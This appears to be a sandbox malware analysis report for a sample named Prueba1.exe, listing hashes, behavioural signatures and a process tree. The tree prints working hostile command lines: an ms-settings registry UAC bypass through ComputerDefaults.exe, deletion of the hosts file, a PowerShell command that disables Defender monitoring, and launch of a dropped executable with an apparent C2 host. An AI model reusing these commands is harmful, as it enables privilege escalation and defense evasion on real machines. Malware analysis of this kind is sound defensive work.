Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1793s -
max time network
1161s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
25/09/2024, 17:58
Static task
static1
Behavioral task
behavioral1
Sample
Prueba1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Prueba1.exe
Resource
win10v2004-20240802-en
General
-
Target
Prueba1.exe
-
Size
227KB
-
MD5
4339cc7cb7c8df84a3a1bbd3cba4cf17
-
SHA1
b041a7ac27006a3d204726cecef465a34f06a3f3
-
SHA256
e3ebbde456c0c20d1436661909137cd38ce6be51cf78e7cb0d2944b124bed326
-
SHA512
3e795d43daa63db9435ab3d03a6800719f25b1f8311188148c5ac51eea1835ca76a6fb10040559271e42de7b3d5e18dda89a572fb975ee60f6a90d1575a85f31
-
SSDEEP
3072:W+PSS5WcZM55FjBcmnE2V/anyoQI5swjEG6vpRcuKtK41rL2JtjwKk:tPSPX5FWhMwj16xrcKaLWjwKk
Malware Config
Signatures
-
Modifies Windows Firewall 2 TTPs 3 IoCs
pid Process 5076 netsh.exe 1016 netsh.exe 4720 netsh.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation wscript.exe -
Executes dropped EXE 4 IoCs
pid Process 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2004 NakedElephants.jpeg 1328 NakedElephants.jpeg 4100 NakedElephants.jpeg -
pid Process 1620 powershell.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 14 raw.githubusercontent.com 16 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 60 checkip.amazonaws.com -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 3572 cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2004 NakedElephants.jpeg 2004 NakedElephants.jpeg 4100 NakedElephants.jpeg 4100 NakedElephants.jpeg -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\profapi.dll ZmbyrFypnUjzwf2LD7LMX006.exe File opened for modification C:\Windows\profapi.dll ZmbyrFypnUjzwf2LD7LMX006.exe File opened for modification C:\Windows\profapi.dll attrib.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ZmbyrFypnUjzwf2LD7LMX006.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ZmbyrFypnUjzwf2LD7LMX006.exe -
Modifies registry class 22 IoCs
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\993027.vbs" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\450650.vbs" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\ms-settings reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 1620 powershell.exe 1620 powershell.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 2492 ZmbyrFypnUjzwf2LD7LMX006.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3516 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1620 powershell.exe Token: SeDebugPrivilege 2492 ZmbyrFypnUjzwf2LD7LMX006.exe Token: SeDebugPrivilege 2492 ZmbyrFypnUjzwf2LD7LMX006.exe Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeDebugPrivilege 2712 taskmgr.exe Token: SeSystemProfilePrivilege 2712 taskmgr.exe Token: SeCreateGlobalPrivilege 2712 taskmgr.exe Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: 33 2712 taskmgr.exe Token: SeIncBasePriorityPrivilege 2712 taskmgr.exe Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeShutdownPrivilege 3516 Explorer.EXE Token: SeCreatePagefilePrivilege 3516 Explorer.EXE Token: SeDebugPrivilege 5064 taskmgr.exe Token: SeSystemProfilePrivilege 5064 taskmgr.exe Token: SeCreateGlobalPrivilege 5064 taskmgr.exe Token: SeShutdownPrivilege 3516 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 3516 Explorer.EXE 3516 Explorer.EXE 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 3516 Explorer.EXE 3516 Explorer.EXE 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 3516 Explorer.EXE 3516 Explorer.EXE 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 2712 taskmgr.exe 3516 Explorer.EXE 3516 Explorer.EXE 3516 Explorer.EXE 3516 Explorer.EXE 3516 Explorer.EXE 3516 Explorer.EXE 3516 Explorer.EXE 3516 Explorer.EXE 3516 Explorer.EXE 3516 Explorer.EXE 3516 Explorer.EXE 3516 Explorer.EXE 3516 Explorer.EXE 3516 Explorer.EXE 3516 Explorer.EXE 3516 Explorer.EXE 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe 5064 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2492 ZmbyrFypnUjzwf2LD7LMX006.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4100 wrote to memory of 216 4100 Prueba1.exe 83 PID 4100 wrote to memory of 216 4100 Prueba1.exe 83 PID 216 wrote to memory of 1728 216 cmd.exe 85 PID 216 wrote to memory of 1728 216 cmd.exe 85 PID 4100 wrote to memory of 5036 4100 Prueba1.exe 86 PID 4100 wrote to memory of 5036 4100 Prueba1.exe 86 PID 5036 wrote to memory of 536 5036 cmd.exe 88 PID 5036 wrote to memory of 536 5036 cmd.exe 88 PID 5036 wrote to memory of 1864 5036 cmd.exe 89 PID 5036 wrote to memory of 1864 5036 cmd.exe 89 PID 4100 wrote to memory of 1720 4100 Prueba1.exe 90 PID 4100 wrote to memory of 1720 4100 Prueba1.exe 90 PID 1720 wrote to memory of 2804 1720 cmd.exe 92 PID 1720 wrote to memory of 2804 1720 cmd.exe 92 PID 2804 wrote to memory of 4432 2804 ComputerDefaults.exe 93 PID 2804 wrote to memory of 4432 2804 ComputerDefaults.exe 93 PID 4432 wrote to memory of 2512 4432 wscript.exe 94 PID 4432 wrote to memory of 2512 4432 wscript.exe 94 PID 4100 wrote to memory of 4036 4100 Prueba1.exe 97 PID 4100 wrote to memory of 4036 4100 Prueba1.exe 97 PID 4100 wrote to memory of 4944 4100 Prueba1.exe 99 PID 4100 wrote to memory of 4944 4100 Prueba1.exe 99 PID 4944 wrote to memory of 4212 4944 cmd.exe 101 PID 4944 wrote to memory of 4212 4944 cmd.exe 101 PID 4100 wrote to memory of 4288 4100 Prueba1.exe 102 PID 4100 wrote to memory of 4288 4100 Prueba1.exe 102 PID 4288 wrote to memory of 4208 4288 cmd.exe 104 PID 4288 wrote to memory of 4208 4288 cmd.exe 104 PID 4100 wrote to memory of 1628 4100 Prueba1.exe 105 PID 4100 wrote to memory of 1628 4100 Prueba1.exe 105 PID 1628 wrote to memory of 1056 1628 cmd.exe 108 PID 1628 wrote to memory of 1056 1628 cmd.exe 108 PID 1628 wrote to memory of 8 1628 cmd.exe 110 PID 1628 wrote to memory of 8 1628 cmd.exe 110 PID 4100 wrote to memory of 1964 4100 Prueba1.exe 111 PID 4100 wrote to memory of 1964 4100 Prueba1.exe 111 PID 1964 wrote to memory of 2012 1964 cmd.exe 113 PID 1964 wrote to memory of 2012 1964 cmd.exe 113 PID 2012 wrote to memory of 1612 2012 ComputerDefaults.exe 114 PID 2012 wrote to memory of 1612 2012 ComputerDefaults.exe 114 PID 1612 wrote to memory of 3592 1612 wscript.exe 115 PID 1612 wrote to memory of 3592 1612 wscript.exe 115 PID 3592 wrote to memory of 2492 3592 cmd.exe 117 PID 3592 wrote to memory of 2492 3592 cmd.exe 117 PID 4100 wrote to memory of 4596 4100 Prueba1.exe 120 PID 4100 wrote to memory of 4596 4100 Prueba1.exe 120 PID 4100 wrote to memory of 2932 4100 Prueba1.exe 122 PID 4100 wrote to memory of 2932 4100 Prueba1.exe 122 PID 2932 wrote to memory of 3924 2932 cmd.exe 124 PID 2932 wrote to memory of 3924 2932 cmd.exe 124 PID 2492 wrote to memory of 3516 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 56 PID 2492 wrote to memory of 3516 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 56 PID 2492 wrote to memory of 3516 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 56 PID 2492 wrote to memory of 3516 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 56 PID 2492 wrote to memory of 3516 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 56 PID 2492 wrote to memory of 3516 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 56 PID 2492 wrote to memory of 3516 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 56 PID 2492 wrote to memory of 3516 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 56 PID 2492 wrote to memory of 3516 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 56 PID 2492 wrote to memory of 3516 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 56 PID 2492 wrote to memory of 3516 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 56 PID 2492 wrote to memory of 3516 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 56 PID 2492 wrote to memory of 3516 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 56 PID 2492 wrote to memory of 3572 2492 ZmbyrFypnUjzwf2LD7LMX006.exe 128 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4232 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3516 -
C:\Users\Admin\AppData\Local\Temp\Prueba1.exe"C:\Users\Admin\AppData\Local\Temp\Prueba1.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
PID:216 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:1728
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\450650.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
- Suspicious use of WriteProcessMemory
PID:5036 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\450650.vbs" /f4⤵
- Modifies registry class
PID:536
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Modifies registry class
PID:1864
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\450650.vbs5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts6⤵PID:2512
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\450650.vbs3⤵PID:4036
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
PID:4944 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Modifies registry class
PID:4212
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:4208
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\993027.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\993027.vbs" /f4⤵
- Modifies registry class
PID:1056
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Modifies registry class
PID:8
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\993027.vbs5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1612 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C start C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\ZmbyrFypnUjzwf2LD7LMX006.exe 5i7z8k04ztx6gvgv4xrwd5b6tyvejz:ZmbyrFypnUjzwf2LD7LMX006:matchashop.icu6⤵
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\ZmbyrFypnUjzwf2LD7LMX006.exeC:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\ZmbyrFypnUjzwf2LD7LMX006.exe 5i7z8k04ztx6gvgv4xrwd5b6tyvejz:ZmbyrFypnUjzwf2LD7LMX006:matchashop.icu7⤵
- Executes dropped EXE
- Drops file in Windows directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\system32\cmd.exe/c attrib +h "C:\Windows\profapi.dll"8⤵
- Hide Artifacts: Hidden Files and Directories
PID:3572 -
C:\Windows\system32\attrib.exeattrib +h "C:\Windows\profapi.dll"9⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:4232
-
-
-
C:\Windows\system32\cmd.exe/c REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 0 >nul8⤵PID:804
-
C:\Windows\system32\reg.exeREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 09⤵PID:2656
-
-
-
C:\Windows\system32\cmd.exe/c powershell Set-MpPreference -DisableRealtimeMonitoring $true >nul 2>&18⤵PID:992
-
